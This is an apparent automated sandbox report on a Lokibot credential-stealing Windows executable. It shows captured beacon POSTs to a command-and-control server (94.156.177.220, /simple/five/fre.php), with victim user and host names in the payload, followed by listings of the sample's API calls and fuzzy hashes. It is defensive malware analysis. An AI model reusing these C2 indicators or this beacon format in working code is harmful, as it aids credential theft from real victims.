Oct 25, 2024 10:22:03.140045881 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:22:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50100	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:22:04.440668106 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:22:04.446101904 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:22:05.409997940 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:22:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50101	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:22:05.570533037 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:22:05.576112032 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:22:06.540014029 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:22:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50102	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:22:06.704200983 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:22:06.709690094 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:22:07.661010981 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:22:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Analysis Process: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exePID: 7468, Parent PID: 2580

General

Target ID:	0
Start time:	04:19:59
Start date:	25/10/2024
Path:	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe"
Imagebase:	0x400000
File size:	106'496 bytes
MD5 hash:	3FB350F4356F42B51A523B6FA8CBCCF3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000000.1682431268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, Author: unknown Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000000.00000002.2948580807.000000000083E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exePID: 7468, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	31.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA
%s\*, xrefs: 00403D99

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 37f6e0de98243db13940183a6d740f716220b5c39bd862cb24faecfac080353b
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 37f6e0de98243db13940183a6d740f716220b5c39bd862cb24faecfac080353b
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
